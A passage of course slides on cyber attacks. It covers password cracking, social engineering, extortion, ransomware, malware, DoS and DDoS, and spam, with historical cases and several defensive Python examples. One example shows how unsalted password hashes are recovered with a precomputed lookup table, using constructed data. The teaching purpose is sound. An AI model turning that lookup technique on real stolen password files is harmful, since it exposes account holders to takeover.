Unit3 Cs

The document discusses various types of cyber attacks including denial-of-service attacks, password attacks, social engineering attacks, and information extortion. Password attacks can include brute force attacks, dictionary attacks, and rainbow table attacks. Social engineering attacks may involve phishing, pretexting, or advance-fee fraud. Information extortion involves thieves encrypting and demanding ransom for stolen private information.

UNIT 3

CYBER ATTACKS (definitions and examples):


Denial-of-service attacks, Man-in-the middle
attack, Phishing, spoofing and spam attacks,
Drive-by attack, Password attack,
SQL injection attack, Cross-site scripting attack,
Eavesdropping attack, Birthday attack,
Malware attacks, Social Engineering attacks
Cracker & Phreaker
• Cracker: A hacker who intentionally removes or bypasses software
copyright protection designed to prevent unauthorized duplication or
use.
• Phreaker: A hacker who manipulates the public telephone system to
make free calls or disrupt services.

Password Attacks
• 10.4 Password rule: An industry recommendation for password structure and
strength that specifies passwords should be at least 10 characters long and contain
at least one uppercase letter, one lowercase letter, one number, and one special
character.
• Brute force password attack: An attempt to guess a password by attempting every
possible combination of characters and numbers in it.
• Cracking: Attempting to reverse-engineer, remove, or bypass a password or other
access control protection, such as the copyright protection on software. See cracker.
• Dictionary password attack: A variation of the brute force password attack that
attempts to narrow the range of possible passwords guessed by using a list of
common passwords and possibly including attempts based on the target’s personal
information.
• Rainbow table: A table of hash values and their corresponding plaintext values that
can be used to look up password values if an attacker is able to steal a system’s
encrypted password file.
Password Attacks
• Password attacks fall under the category of espionage or trespass just
as lock-picking falls under breaking and entering. Attempting to guess
or reverse-calculate a password is often called cracking. There are a
number of alternative approaches to password cracking:
  • Brute force
  • Dictionary
  • Rainbow tables
  • Social engineering

Brute force attack

• Brute force: The application of computing and network resources to try
every possible password combination is called a brute force password
attack. If attackers can narrow the field of target accounts, they can devote
more time and resources to these accounts. This is one reason to always
change the password of the manufacturer’s default administrator account.
• Brute force password attacks are rarely successful against systems that have
adopted the manufacturer’s recommended security practices. Controls that
limit the number of unsuccessful access attempts within a certain time are
very effective against brute force attacks.
• As shown in Table 2-6, the strength of a password determines its ability to
withstand a brute force attack. Using best practice policies like the 10.4
password rule and systems that allow case-sensitive passwords can greatly
enhance their strength.
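The three defensive ideas on this slide, as an added example that is not part of the original slides: a check for the 10.4 password rule, the keyspace a brute force attacker must exhaust (the Table 2-6 point, for a case-sensitive system), and a lockout that limits unsuccessful attempts within a time window. The guess rate, lockout thresholds and the set of "special" characters are assumptions.

```python
"""Added example (not from the slides): 10.4 rule check, brute-force keyspace,
and a failed-attempt lockout window. Rates and thresholds are assumptions."""
import string
from collections import defaultdict, deque

SPECIALS = string.punctuation  # assumption: the 32 printable ASCII punctuation characters


def meets_10_4_rule(password: str) -> bool:
    """10.4 rule: at least 10 characters with at least one uppercase letter,
    one lowercase letter, one digit and one special character."""
    return (
        len(password) >= 10
        and any(c.isupper() for c in password)
        and any(c.islower() for c in password)
        and any(c.isdigit() for c in password)
        and any(c in SPECIALS for c in password)
    )


def keyspace(password: str) -> int:
    """Combinations a brute force attacker must cover for a password of this
    length and character mix: (size of alphabet used) ** (length).
    Only the character classes actually present are counted."""
    alphabet = 0
    if any(c.islower() for c in password):
        alphabet += 26
    if any(c.isupper() for c in password):
        alphabet += 26  # case sensitivity doubles the letter alphabet
    if any(c.isdigit() for c in password):
        alphabet += 10
    if any(c in SPECIALS for c in password):
        alphabet += len(SPECIALS)
    return alphabet ** len(password)


def years_to_exhaust(password: str, guesses_per_second: float = 1e9) -> float:
    """Time to try every combination at a constructed rate of 1e9 guesses/s."""
    return keyspace(password) / guesses_per_second / (365 * 24 * 3600)


class LockoutPolicy:
    """Limit unsuccessful access attempts per account within a sliding window,
    the control the slide describes. max_failures/window are assumptions."""

    def __init__(self, max_failures: int = 5, window_seconds: int = 300):
        self.max_failures = max_failures
        self.window = window_seconds
        self._failures = defaultdict(deque)  # account -> timestamps of failures

    def _prune(self, account: str, now: float) -> deque:
        q = self._failures[account]
        while q and now - q[0] > self.window:  # forget failures outside the window
            q.popleft()
        return q

    def record_failure(self, account: str, now: float) -> None:
        self._prune(account, now).append(now)

    def is_locked(self, account: str, now: float) -> bool:
        return len(self._prune(account, now)) >= self.max_failures


if __name__ == "__main__":
    for pw in ("password", "Tr0ub4dor&3"):
        print(pw, meets_10_4_rule(pw), f"{years_to_exhaust(pw):.2e} years")
    policy = LockoutPolicy(max_failures=3, window_seconds=60)
    for t in (0, 10, 20):
        policy.record_failure("alice", t)
    print("alice locked at t=25:", policy.is_locked("alice", 25))
```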
Table 2.6: password strength and brute force attacks (table not reproduced in this text)

Dictionary Attacks
• Dictionary attacks: The dictionary password attack, or simply
dictionary attack, is a variation of the brute force attack that narrows
the field by using a dictionary of common passwords and includes
information related to the target user, such as names of relatives or
pets, and familiar numbers such as phone numbers, addresses, and
even Social Security numbers.
• Organizations can use similar dictionaries to disallow passwords
during the reset process and thus guard against passwords that are
easy to guess. In addition, rules requiring numbers and special
characters in passwords make the dictionary attack less effective.

Rainbow Tables
• Rainbow tables: A far more sophisticated and potentially much faster
password attack is possible if the attacker can gain access to an
encrypted password file, such as the Security Account Manager (SAM)
data file.
• While these password files contain hashed representations of users’
passwords—not the actual passwords, and thus cannot be used by
themselves—the hash values for a wide variety of passwords can be
looked up in a database known as a rainbow table.
• These plain text files can be quickly searched, and a hash value and its
corresponding plaintext value can be easily located.
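Why a stolen file of unsalted hashes can be reversed by table lookup, and why a per-user salt defeats the precomputation, as an added example that is not part of the original slides. The wordlist, accounts and salts are constructed; SHA-256 stands in for whatever unsalted hash a password file uses, and a real rainbow table stores hash chains rather than every (hash, plaintext) pair, but the lookup property is the same.

```python
"""Added example (not from the slides): precomputed hash -> plaintext lookup
against unsalted versus salted password storage. All data is constructed."""
import hashlib
import os
from typing import Dict, Optional

# Constructed wordlist standing in for the common passwords a table is built from.
COMMON_PASSWORDS = ["123456", "password", "qwerty", "letmein", "Summer2014"]


def unsalted_hash(password: str) -> str:
    """Stand-in for any fast, unsalted password hash (SHA-256 here)."""
    return hashlib.sha256(password.encode()).hexdigest()


def salted_hash(password: str, salt: bytes) -> str:
    """A per-user salt is mixed into the input, so the same password no longer
    produces the same digest on two accounts or on two systems."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def build_lookup_table(wordlist) -> Dict[str, str]:
    """Precompute digest -> plaintext once; the work is reused against every
    stolen file that uses the same unsalted hash."""
    return {unsalted_hash(pw): pw for pw in wordlist}


def recover(stolen_file: Dict[str, str], table: Dict[str, str]) -> Dict[str, Optional[str]]:
    """Look each stolen digest up in the table; None means it was not found."""
    return {user: table.get(digest) for user, digest in stolen_file.items()}


def demo():
    """Run the same table against an unsalted and a salted copy of the same accounts."""
    table = build_lookup_table(COMMON_PASSWORDS)
    # Constructed accounts: two use wordlist passwords, one does not.
    accounts = {"alice": "Summer2014", "bob": "letmein", "carol": "c0rrect-h0rse-b@ttery"}
    unsalted_file = {u: unsalted_hash(pw) for u, pw in accounts.items()}
    # Salted storage keeps a random 16-byte salt next to each digest.
    salts = {u: os.urandom(16) for u in accounts}
    salted_file = {u: salted_hash(pw, salts[u]) for u, pw in accounts.items()}
    return recover(unsalted_file, table), recover(salted_file, table)


if __name__ == "__main__":
    from_unsalted, from_salted = demo()
    print("unsalted file:", from_unsalted)  # alice and bob recovered, carol not
    print("salted file:  ", from_salted)    # nothing recovered; table would need rebuilding per salt
```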

Social Engineering Password Attacks
• Social engineering password attacks: While social engineering is discussed
in detail later in the section called “Human Error or Failure,” it is worth
mentioning here as a mechanism to gain password information.
• Attackers posing as an organization’s IT professionals may attempt to gain
access to systems information by contacting low-level employees and
offering to help with their computer issues.
• After all, what employee doesn’t have issues with computers? By posing as
a friendly helpdesk or repair technician, the attacker asks employees for
their usernames and passwords, then uses the information to gain access
to organizational systems.
• Some even go so far as to actually resolve the user’s issues. Social
engineering is much easier than hacking servers for password files.
Social Engineering
• Advance-fee fraud (AFF): A form of social engineering, typically conducted
via e-mail, in which an organization or some third party indicates that the
recipient is due an exorbitant amount of money and needs only a small
advance fee or personal banking information to facilitate the transfer.
• Phishing: A form of social engineering in which the attacker provides what
appears to be a legitimate communication (usually e-mail), but it contains
hidden or embedded code that redirects the reply to a third-party site in an
effort to extract personal or confidential information.
• Pretexting: A form of social engineering in which the attacker pretends to
be an authority figure who needs information to confirm the target’s
identity, but the real object is to trick the target into revealing confidential
information. Pretexting is commonly performed by telephone.
• Social engineering: The process of using social skills to convince people to
reveal access credentials or other valuable information to an attacker.
• Spear phishing: Any highly targeted phishing attack.
Advance-fee Fraud
• Advance-fee fraud: Another social engineering attack, the advance-fee
fraud (AFF), internationally known as the 4-1-9 fraud, is named after a section of
the Nigerian penal code.
• The perpetrators of 4-1-9 schemes often use the names of fictitious companies,
such as the Nigerian National Petroleum Company.
• Alternatively, they may invent other entities, such as a bank, government agency,
long-lost relative, lottery, or other nongovernmental organization.
• See Figure 2-10 for a sample letter used for this type of scheme.
• The scam is notorious for stealing funds from credulous people, first by requiring
them to participate in a proposed money-making venture by sending money up
front, and then by soliciting an endless series of fees.
• These 4-1-9 schemes are even suspected to involve kidnapping, extortion, and
murder.
• According to Ultrascan Advanced Global Investigations, more than $82 billion had
been swindled from victims as of 2014.
• For more information on AFF, go to the Advance Fee Fraud Coalition’s Web site at
http://affcoalition.org.
Figure 2.10: sample letter used in an advance-fee fraud scheme (image not reproduced)

Information Extortion
• Information extortion: The act of an attacker or trusted
insider who steals or interrupts access to information from a
computer system and demands compensation for its return
or for an agreement not to disclose the information.
• Ransomware: Computer software specifically designed to
identify and encrypt valuable information in a victim’s
system in order to extort payment for the key needed to
unlock the encryption.

Information extortion
• Information extortion, also known as cyberextortion, is common in
the theft of credit card numbers.
• For example, Web-based retailer CD Universe was victimized by a
theft of data files that contained customer credit card information.
• The culprit was a Russian hacker named Maxus who hacked the
online vendor and stole several hundred thousand credit card
numbers.
• When the company refused to pay the $100,000 blackmail, he posted
the card numbers to a Web site, offering them to the criminal
community. His Web site became so popular he had to restrict access.
Information extortion
• Another incident of extortion occurred in 2008 when pharmacy benefits
manager Express Scripts, Inc. fell victim to a hacker who demonstrated that
he had access to 75 customer records and claimed to have access to
millions more.
• The perpetrator demanded an undisclosed amount of money. The
company notified the FBI and offered a $1 million reward for the arrest of
the perpetrator.
• Express Scripts notified the affected customers, as required by various state
laws.
• The company was obliged to pay undisclosed expenses for the
notifications, and was required to buy credit monitoring services for its
customers in some states.
• In 2010, Anthony Digati allegedly threatened to conduct a spam
attack on the insurance company New York Life.
• He reportedly sent dozens of e-mails to company executives
threatening to conduct a negative image campaign by sending over 6
million e-mails to people throughout the country.
• He then demanded approximately $200,000 to stop the attack, and
next threatened to increase the demand to more than $3 million if
the company ignored him. His arrest thwarted the spam attack.

• In 2012, a programmer from Walachi Innovation Technologies allegedly
broke into the organization’s systems and changed the access passwords
and codes, locking legitimate users out of the system. He then reportedly
demanded $300,000 in exchange for the new codes.
• A court order eventually forced him to surrender the information to the
organization.
• In Russia, a talented hacker created malware that installed inappropriate
materials on an unsuspecting user’s system, along with a banner
threatening to notify the authorities if a bribe was not paid.
• At 500 rubles (about $17), victims in Russia and other countries were more
willing to pay the bribe than risk prosecution by less considerate law
enforcement.
Ransomware
• The latest type of attack in this category is known as ransomware. Ransomware is
a malware attack on the host system that denies access to the user and then
offers to provide a key to allow access back to the user’s system and data for a
fee.
• There are two types of ransomware: lockscreen and encryption.
• Lockscreen ransomware denies access to the user’s system simply by disabling
access to the desktop and preventing the user from bypassing the ransom screen
that demands payment.
• Encryption ransomware is far worse, in that it encrypts some or all of a user’s
hard drive and then demands payment. Common phishing mechanisms to get a
user to download ransomware include popups indicating that illegal information
or malware was detected on the user’s system, threatening to notify law
enforcement, or offering to delete the offending material if the user clicks a link
or button.

Online Activism
• Cyberactivist: See hacktivist.
• Cyberterrorist: A hacker who attacks systems to conduct terrorist
activities via networks or Internet pathways.
• Cyberwarfare: Formally sanctioned offensive operations conducted by
a government or state against information or systems of another
government or state. Sometimes called information warfare.
• Hacktivist: A hacker who seeks to interfere with or disrupt systems to
protest the operations, policies, or actions of an organization or
government agency.

Cyberterrorism and Cyberwarfare
• A much more sinister form of hacking is cyberterrorism. The United
States and other governments are developing security measures
intended to protect critical computing and communications networks
as well as physical and power utility infrastructures.
• Cyberterrorism has thus far been largely limited to acts such as the
defacement of NATO Web pages during the war in Kosovo. Some
industry observers have taken the position that cyberterrorism is not
a real threat, but instead is merely hype that distracts from more
concrete and pressing information security issues that do need
attention.

Software Attacks
• Deliberate software attacks occur when an individual or group
designs and deploys software to attack a system.
• This attack can consist of specially crafted software that attackers
trick users into installing on their systems.
• This software can be used to overwhelm the processing capabilities of
online systems or to gain access to protected systems by hidden
means.

Malware
• Malware is referred to as malicious code or malicious software. Other
attacks that use software, like redirect attacks and denial-of-service
attacks, also fall under this threat.
• These software components or programs are designed to damage,
destroy, or deny service to targeted systems.
• Note that the terminology used to describe malware is often not
mutually exclusive; for instance, Trojan horse malware may be
delivered as a virus, a worm, or both.

Malware
• Malicious code attacks include the execution of viruses, worms, Trojan horses, and active
Web scripts with the intent to destroy or steal information.
• The most state-of-the-art malicious code attack is the polymorphic worm, or multivector
worm.
• These attack programs use up to six known attack vectors to exploit a variety of
vulnerabilities in common information system devices.
• Many successful malware attacks are completed using techniques that are widely known;
some have been in use for years.
• When an attack makes use of malware that is not yet known by the anti-malware
software companies, it is said to be a zero-day attack.
• Other forms of malware include covert software applications—bots, spyware, and
adware—that are designed to work out of users’ sight or be triggered by an apparently
innocuous user action.
• Bots are often the technology used to implement Trojan horses, logic bombs, back
doors, and spyware.
• Spyware is placed on a computer to secretly gather information about the user and
report it.
Malware
• One type of spyware is a Web bug, a tiny graphic that is referenced
within the Hypertext Markup Language (HTML) content of a Web
page or e-mail to collect information about the user viewing the
content.
• Another form of spyware is a tracking cookie, which is placed on
users’ computers to track their activity on different Web sites and
create a detailed profile of their behavior.
• Each of these hidden code components can be used to collect user
information that could then be used in a social engineering or identity
theft attack.
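A defender-side check for the Web bug described above, as an added example that is not part of the original slides: scan the HTML of a page or e-mail for `<img>` elements that are fetched from a different host and are either 1x1 or hidden, the usual shape of a tracking graphic. The sample HTML, host names and size/visibility heuristics are constructed assumptions.

```python
"""Added example (not from the slides): flag third-party 1x1 or hidden images
(Web bugs) in HTML content. Sample markup and heuristics are constructed."""
from html.parser import HTMLParser
from typing import List
from urllib.parse import urlparse

# Constructed page: an ordinary logo, a 1x1 third-party pixel, and a hidden third-party image.
SAMPLE_HTML = """
<html><body>
<img src="https://example.com/static/logo.png" width="200" height="60" alt="logo">
<p>Quarterly newsletter</p>
<img src="https://tracker.example.net/pixel.gif?u=12345" width="1" height="1">
<img src="https://ads.example.org/beacon.gif" style="display: none">
</body></html>
"""


def _dimension(value) -> int:
    """Parse a width/height attribute; missing or unparsable counts as large (not a pixel)."""
    try:
        return int(str(value).strip().rstrip("px"))
    except ValueError:
        return 10 ** 6


class WebBugScanner(HTMLParser):
    """Collect <img> sources that live on another host and are tiny or hidden."""

    def __init__(self, page_host: str):
        super().__init__()
        self.page_host = page_host
        self.flagged: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":
            return
        a = dict(attrs)
        src = a.get("src") or ""
        host = urlparse(src).hostname
        tiny = _dimension(a.get("width")) <= 1 and _dimension(a.get("height")) <= 1
        style = (a.get("style") or "").replace(" ", "").lower()
        hidden = "display:none" in style or "visibility:hidden" in style
        # Same-host images are the page's own content; only remote tiny/hidden ones are flagged.
        if host and host != self.page_host and (tiny or hidden):
            self.flagged.append(src)


def find_web_bugs(html: str, page_host: str) -> List[str]:
    """Return the src of every suspected Web bug in html, in document order."""
    scanner = WebBugScanner(page_host)
    scanner.feed(html)
    scanner.close()
    return scanner.flagged


if __name__ == "__main__":
    for src in find_web_bugs(SAMPLE_HTML, "example.com"):
        print("suspected Web bug:", src)
```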

Table 2-7 draws on two recent studies to list some of the malware that has had the
biggest impact on computer users to date.

Malware (Key Terms)
• Adware: Malware intended to provide undesired marketing and
advertising, including popups and banners on a user’s screens.
• Boot virus: Also known as a boot sector virus, a type of virus that targets
the boot sector or Master Boot Record (MBR) of a computer system’s hard
drive or removable storage media.
• Macro virus: A type of virus written in a specific macro language to target
applications that use the language. The virus is activated when the
application’s product is opened. A macro virus typically affects documents,
slideshows, e-mails, or spreadsheets created by office suite applications.
• Malware: Computer software specifically designed to perform malicious or
unwanted actions.
• Memory-resident virus: A virus that is capable of installing itself in a
computer’s operating system, starting when the computer is activated, and
residing in the system’s memory even after the host application is
terminated. Also known as a resident virus.
Malware (Key Terms)
• Non-memory-resident virus: A virus that terminates after it has been activated, infected its host
system, and replicated itself. NMR viruses do not reside in an operating system or memory after
executing. Also known as a non-resident virus.
• Polymorphic threat: Malware (a virus or worm) that over time changes the way it appears to
antivirus software programs, making it undetectable by techniques that look for preconfigured
signatures.
• Spyware: Any technology that aids in gathering information about people or organizations
without their knowledge.
• Trojan horse: A malware program that hides its true nature and reveals its designed behavior only
when activated.
• Virus: A type of malware that is attached to other executable programs. When activated, it
replicates and propagates itself to multiple systems, spreading by multiple communications
vectors. For example, a virus might send copies of itself to all users in the infected system’s e-mail
program.
• Virus hoax: A message that reports the presence of a nonexistent virus or worm and wastes
valuable time as employees share the message.
• Worm: A type of malware that is capable of activation and replication without being attached to
an existing program.
• Zero-day attack: An attack that makes use of malware that is not yet known by the anti-malware
software companies.
Virus
• Virus: A computer virus consists of code segments (programming instructions)
that perform malicious actions.
• This code behaves much like a virus pathogen that attacks animals and plants,
using the cell’s own replication machinery to propagate the attack beyond the
initial target.
• The code attaches itself to an existing program and takes control of the program’s
access to the targeted computer.
• The virus-controlled target program then carries out the virus plan by replicating
itself into additional targeted systems. Often, users unwittingly help viruses get
into a system.
• Opening infected e-mail or some other seemingly trivial action can cause
anything from random messages appearing on a user’s screen to the destruction
of entire hard drives.
• Just as their namesakes are passed among living bodies, computer viruses are
passed from machine to machine via physical media, e-mail, or other forms of
computer data transmission.
• When these viruses infect a machine, they may immediately scan it for e-mail
applications or even send themselves to every user in the e-mail address book.
Virus
• One of the most common methods of virus transmission is via e-mail attachment
files.
• Most organizations block e-mail attachments of certain types and filter all e-mail
for known viruses.
• Years ago, viruses were slow-moving creatures that transferred viral payloads
through the cumbersome movement of diskettes from system to system.
• Now computers are networked, and e-mail programs prove to be fertile ground
for computer viruses unless suitable controls are in place.
• The current software marketplace has several established vendors, such as
Symantec Norton AntiVirus, Kaspersky Antivirus, AVG AntiVirus, and McAfee
VirusScan, which provide applications to help control computer viruses.
• Microsoft’s Malicious Software Removal Tool is freely available to help users of
Windows operating systems remove viruses and other types of malware.
• Many vendors are moving to software suites that include antivirus applications
and provide other malware and nonmalware protection, such as firewall
protection programs.
Virus
• Viruses can be classified by how they spread themselves.
• Among the most common types of information system viruses are the macro
virus, which is embedded in automatically executing macro code used by word
processors, spreadsheets, and database applications, and the boot virus, which
infects the key operating system files in a computer’s boot sector.
• Viruses can also be described by how their programming is stored and moved.
Some are found as binary executables, including .exe or .com files; or as
interpretable data files, such as command scripts or a specific application’s
document files; or both.
• Alternatively, viruses may be classified as memory-resident viruses or non-
memory-resident viruses, depending on whether they persist in a computer
system’s memory after they have been executed.
• Resident viruses are capable of reactivating when the computer is booted and
continuing their actions until the system is shut down, only to restart the next
time the system is booted.
• In 2002, the author of the Melissa virus, David L. Smith of New Jersey, was
convicted in U.S. federal court and sentenced to 20 months in prison, a $5,000
fine, and 100 hours of community service upon release.
Viruses and worms can use several attack vectors to spread
copies of themselves to networked peer computers, as
illustrated in Table 2-8.

Worms
• Worms: Named for the tapeworm in John Brunner’s novel The Shockwave
Rider, worms can continue replicating themselves until they completely fill
available resources, such as memory, hard drive space, and network
bandwidth. Read the nearby Offline feature about Robert Morris to learn
how much damage a worm can cause.
• Code Red, Sircam, Nimda (“admin” spelled backwards), and Klez are
examples of a class of worms that combine multiple modes of attack into a
single package. Figure 2-15 shows sample e-mails that contain the Nimda
and Sircam worms.
• These newer worm variants contain multiple exploits that can use any
predefined distribution vector to programmatically distribute the worm.
(See the section on polymorphic threats later in this chapter for more
details.)

Figure 2-15: sample e-mails containing the Nimda and Sircam worms (image not reproduced)

Worms
• Even though it happened long ago, the outbreak of Nimda in September
2001 still serves as an example of how quickly and widely malware can
spread.
• It used five of the six vectors shown in Table 2-8 to spread itself with
startling speed.
• TruSecure Corporation, an industry source for information security
statistics and solutions, reports that Nimda spread across the Internet
address space of 14 countries in less than 25 minutes.
• The Klez worm, shown in Figure 2-16, delivers a double-barreled payload: It
has an attachment that contains the worm, and if the e-mail is viewed on
an HTML-enabled browser, it attempts to deliver a macro virus.
• News-making attacks, such as MyDoom and Netsky, are variants of the
multifaceted attack worms and viruses that exploit weaknesses in leading
operating systems and applications.
Worms
• The complex behavior of worms can be initiated with or without the user
downloading or executing the file. Once the worm has infected a computer,
it can redistribute itself to all e-mail addresses found on the infected
system. Furthermore, a worm can deposit copies of itself onto all Web
servers that the infected system can reach; users who subsequently visit
those sites become infected. Worms also take advantage of open shares
found on the network in which an infected system is located. The worms
place working copies of their code onto the server so that users of the
open shares are likely to become infected.
• In 2003, Jeffrey Lee Parson, an 18-year-old high school student from
Minnesota, was arrested for creating and distributing a variant of the
Blaster worm called W32.Blaster-B. He was sentenced to 18 months in
prison, 3 years of supervised release, and 100 hours of community
service. The original Blaster worm was reportedly created by a Chinese
hacker group.
Trojan Horses
• Trojan horses are frequently disguised as helpful, interesting, or necessary
pieces of software, such as the readme.exe files often included with shareware or
freeware packages.
• Like their namesake in Greek legend, once Trojan horses are brought into a system, they
become activated and can wreak havoc on the unsuspecting user.
• Figure 2-17 outlines a typical Trojan horse attack.
• Around January 20, 1999, Internet e-mail users began receiving messages with an
attachment of a Trojan horse program named Happy99.exe.
• When the e-mail attachment was opened, a brief multimedia program displayed
fireworks and the message “Happy 1999.”
• While the fireworks display was running, the Trojan horse program was installing itself
into the user’s system.
• The program continued to propagate itself by following up every e-mail the user sent
with a second e-mail to the same recipient and with the same attack program attached.
• A newer variant of the Trojan horse is an attack known as SMiShing, in which the victim is
tricked into downloading malware onto a mobile phone via a text message.
• SMiShing is short for SMS phishing.
Figure 2-17: a typical Trojan horse attack (image not reproduced)

Polymorphic Threats
• Polymorphic threats: One of the biggest challenges to fighting viruses and worms has
been the emergence of polymorphic threats.
• A polymorphic threat actually evolves, changing its size and other external file
characteristics to elude detection by antivirus software programs.

Virus and Worm Hoaxes
• Virus and worm hoaxes: As frustrating as viruses and worms are, perhaps more
time and money are spent resolving virus hoaxes.
• Well-meaning people can disrupt the harmony and flow of an organization when
they send group e-mails warning of supposedly dangerous viruses that don’t
exist.
• When people fail to follow virus-reporting procedures in response to a hoax, the
network becomes overloaded and users waste time and energy forwarding the
warning message to everyone they know, posting the message on bulletin boards,
and trying to update their antivirus protection software.
• Some hoaxes are the chain letters or chain e-mails of the day, which are designed
to annoy or bemuse the reader.
• They are known as “weapons of mass distraction.” One of the most prominent
virus hoaxes was the 1994 “Goodtimes virus,” which reportedly was transmitted
in an e-mail with the header “Good Times” or “goodtimes.” The virus never
existed, and thousands of hours of employee time were wasted retransmitting
the e-mail, effectively creating a denial of service.
Virus and Worm Hoaxes
• At one time, hoaxes amounted to little more than pranks, although
occasionally a sting was attached.
• For example, the Teddy Bear hoax tricked users into deleting necessary
operating system files, which made their systems stop working.
• Recently, criminals have been able to monetize the hoax virus by claiming
that systems are infected with malware and then selling a cure for a
problem that does not exist.
• The perpetrator of the hoax may then offer to sell a fake antivirus program
to correct the fake malware.
• Several Internet resources enable people to research viruses and
determine if they are fact or fiction.

Back Doors
• Back door: A malware payload that provides access to a system by bypassing normal
access controls. A back door may also be an intentional access control bypass left by a
system designer to facilitate development.
• Using a known or newly discovered access mechanism, an attacker can gain access to a
system or network resource through a back door.
• Viruses and worms can have a payload that installs a back door or trap door component
in a system, allowing the attacker to access the system at will with special privileges.
• Examples of such payloads include Subseven and Back Orifice.
• Sometimes these doors are left behind by system designers or maintenance staff; such a
door is referred to as a maintenance hook.
• More often, attackers place a back door into a system or network they have
compromised, making their return to the system that much easier the next time.
• A trap door is hard to detect because the person or program that places it often makes
the access exempt from the system’s usual audit logging features and makes every
attempt to keep the back door hidden from the system’s legitimate owners.
Denial-of-Service (DoS) and Distributed
Denial-of-Service (DDoS) Attacks
• Bot: An abbreviation of robot, an automated software program that
executes certain commands when it receives a specific input. See also
zombie.
• Denial-of-service (DoS) attack: An attack that attempts to overwhelm a
computer target’s ability to handle incoming communications,
prohibiting legitimate users from accessing those systems.
• Distributed denial-of-service (DDoS) attack: A form of DoS attack in
which a coordinated stream of requests is launched against a target
from many locations at the same time using bots or zombies.
• Zombie: See bot.
Denial-of-Service (DoS) and Distributed
Denial-of-Service (DDoS) Attacks
• In a denial-of-service (DoS) attack, the attacker sends a large number of
connection or information requests to a target (see Figure 2-18). So many
requests are made that the target system becomes overloaded and cannot
respond to legitimate requests for service. The system may crash or simply
become unable to perform ordinary functions.
• In a distributed denial-of-service (DDoS) attack, a coordinated stream of
requests is launched against a target from many locations at the same
time. Most DDoS attacks are preceded by a preparation phase in which
many systems, perhaps thousands, are compromised. The compromised
machines are turned into bots or zombies, machines that are directed
remotely by the attacker (usually via a transmitted command) to
participate in the attack.

Denial-of-Service (DoS) and Distributed
Denial-of-Service (DDoS) Attacks
• DDoS attacks are more difficult to defend against, and currently there are
no controls that any single organization can apply. There are, however,
some cooperative efforts to enable DDoS defenses among groups of service
providers; an example is the Consensus Roadmap for Defeating Distributed
Denial of Service Attacks. To use a popular metaphor, DDoS is considered a
weapon of mass destruction on the Internet.
• The MyDoom worm attack in February 2004 was intended to be a DDoS
attack against www.sco.com, the Web site of a vendor for a UNIX operating
system. Allegedly, the attack was payback for the SCO Group’s perceived
hostility toward the open-source Linux community.
• Any system connected to the Internet and providing TCP-based network
services (such as a Web server, FTP server, or mail server) is vulnerable to
DoS attacks. DoS attacks can also be launched against routers or other
network server systems if these hosts enable other TCP services, such as
echo.
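The DoS versus DDoS distinction drawn on these slides, as an added detection example that is not part of the original slides: over a connection log, a flood from one source stands out per source and can be rate-limited or blocked locally, while a distributed flood keeps every source under the per-source limit and only shows in the aggregate, which is why no single organization can control it alone. The log format, addresses (RFC 5737 documentation ranges) and thresholds are constructed assumptions.

```python
"""Added example (not from the slides): classify the busiest window of a
connection log as normal, single-source DoS, or distributed DDoS.
Log lines, addresses and thresholds are constructed assumptions."""
from collections import Counter, defaultdict
from typing import List, Tuple

WINDOW = 12              # seconds per analysis bucket (assumption)
PER_SOURCE_LIMIT = 100   # requests one source may make per window (assumption)
AGGREGATE_LIMIT = 1000   # total requests per window the service can absorb (assumption)
MANY_SOURCES = 50        # distinct sources that make a flood "distributed" (assumption)

# Constructed logs, one line per request: "<epoch-second> <source-ip> <request>".
DOS_LOG = [f"{1200 + i // 50} 203.0.113.5 GET /" for i in range(600)] + \
          [f"{1200 + i} 198.51.100.{i % 20} GET /" for i in range(12)]
DDOS_LOG = [f"{1200 + i // 200} 198.51.100.{i % 200} GET /" for i in range(2000)]
NORMAL_LOG = [f"{1200 + i} 198.51.100.{i % 7} GET /" for i in range(12)]


def parse(lines: List[str]) -> List[Tuple[int, str]]:
    """Extract (timestamp, source) from each log line."""
    events = []
    for line in lines:
        ts, src, _request = line.split(" ", 2)
        events.append((int(ts), src))
    return events


def classify(lines: List[str]) -> Tuple[str, int, int]:
    """Return (verdict, total_requests, distinct_sources) for the busiest window.

    'dos'   : one source exceeds PER_SOURCE_LIMIT; that source can be blocked at the edge.
    'ddos'  : aggregate exceeds AGGREGATE_LIMIT from at least MANY_SOURCES, none individually
              noisy; nothing local to block, the signal is only in the total.
    'normal': neither condition holds.
    """
    buckets = defaultdict(list)
    for ts, src in parse(lines):
        buckets[ts // WINDOW].append(src)
    if not buckets:
        return ("normal", 0, 0)
    sources = max(buckets.values(), key=len)   # the busiest window
    counts = Counter(sources)
    total, distinct = len(sources), len(counts)
    _top_src, top_n = counts.most_common(1)[0]
    if top_n > PER_SOURCE_LIMIT:
        return ("dos", total, distinct)
    if total > AGGREGATE_LIMIT and distinct >= MANY_SOURCES:
        return ("ddos", total, distinct)
    return ("normal", total, distinct)


if __name__ == "__main__":
    for name, log in (("dos", DOS_LOG), ("ddos", DDOS_LOG), ("normal", NORMAL_LOG)):
        print(name, "->", classify(log))
```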
Figure 2.18: Denial-of-service (DoS) attack (image not reproduced)

History of notable DoS attacks
• Prominent in the history of notable DoS attacks are those conducted by
Michael Calce (a.k.a. Mafiaboy) on Amazon.com, CNN.com, ETrade.com,
ebay.com, Yahoo.com, Excite.com, and Dell.com.
• These software-based attacks lasted approximately four hours and
reportedly resulted in millions of dollars in lost revenue. The British ISP
CloudNine is believed to be the first business “hacked out of existence” by
a DoS attack in January 2002.
• This attack was similar to the DoS attacks launched by Mafiaboy in
February 2000. In January 2016, a group calling itself New World Hacking
attacked the BBC’s Web site.
• If the claimed scope of the attack is verified, it would qualify as the largest DDoS
attack recorded up to that time, with an attack rate of 602 Gbps (gigabits per second). The
group also hit Donald Trump’s campaign Web site on the same day.

46
E-mail Attacks
• Mail bomb: An attack designed to overwhelm the receiver with
excessive quantities of e-mail.
• Spam: Undesired e-mail, typically commercial advertising transmitted
in bulk.

47
Spam
• Spam is unsolicited commercial e-mail. While many consider spam a
trivial nuisance rather than an attack, it has been used as a means of
enhancing malicious code attacks.
• In March 2002, there were reports of malicious code embedded in
MP3 files that were included as attachments to spam.
• The most significant consequence of spam, however, is the waste of
computer and human resources.
• Many organizations attempt to cope with the flood of spam by using
e-mail filtering technologies.
• Other organizations simply tell users of the mail system to delete
unwanted messages.

48
Mail Bomb
• A form of e-mail attack that is also a DoS attack is called a mail bomb. It can be
accomplished using traditional e-mailing techniques or by exploiting various
